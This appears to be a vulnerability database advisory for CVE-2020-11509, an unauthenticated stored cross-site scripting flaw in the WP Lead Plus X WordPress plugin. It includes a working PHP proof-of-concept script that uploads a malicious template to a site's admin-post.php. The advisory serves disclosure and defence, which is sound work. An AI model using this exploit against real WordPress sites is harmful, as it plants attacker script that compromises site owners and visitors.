WP Lead Plus X < 0.99 - Unauthenticated Stored Cross-Site Scripting (XSS)



Description
One of the features available to users who have paid for a license key for WP Lead Plus X is the ability to create and use “template” pages, which can be imported as a starting point when creating new pages. Although this feature is not visible if the plugin does not have a license key, it was still possible for an unauthenticated user to import a template containing malicious JavaScript. This was due to an admin_post action available to unprivileged visitors, c37_wpl_import_template
Proof of Concept
<?php
// Settings
$url = $argv[1]; //URL of the site
$urlbits = parse_url($url);
$wp_url = $urlbits['scheme'].'://'.$urlbits['host'].'/';

//Import a malicious page template
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . 'wp-admin/admin-post.php');
$cFile=curl_file_create(realpath('pocpage.tpl'));
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
	'action' => 'c37_wpl_import_template',
	'files_name[]' => $cFile,
]);
$output = curl_exec($ch);
echo $output;
curl_close($ch);

Affects Plugin

References

CVE 2020-11509
URL https://www.wordfence.com/blog/2020/04/critical-vulnerabilities-in-the-wp-lead-plus-x-wordpress-plugin/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Ramuel Gall (Wordfence)
Submitter Ramuel Gall
Views 533
Verified No
WPVDB ID 10168

Timeline

Publicly Published 2020-04-07 (about 2 months ago)
Added 2020-04-07 (about 2 months ago)
Last Updated 2020-04-08 (about 2 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin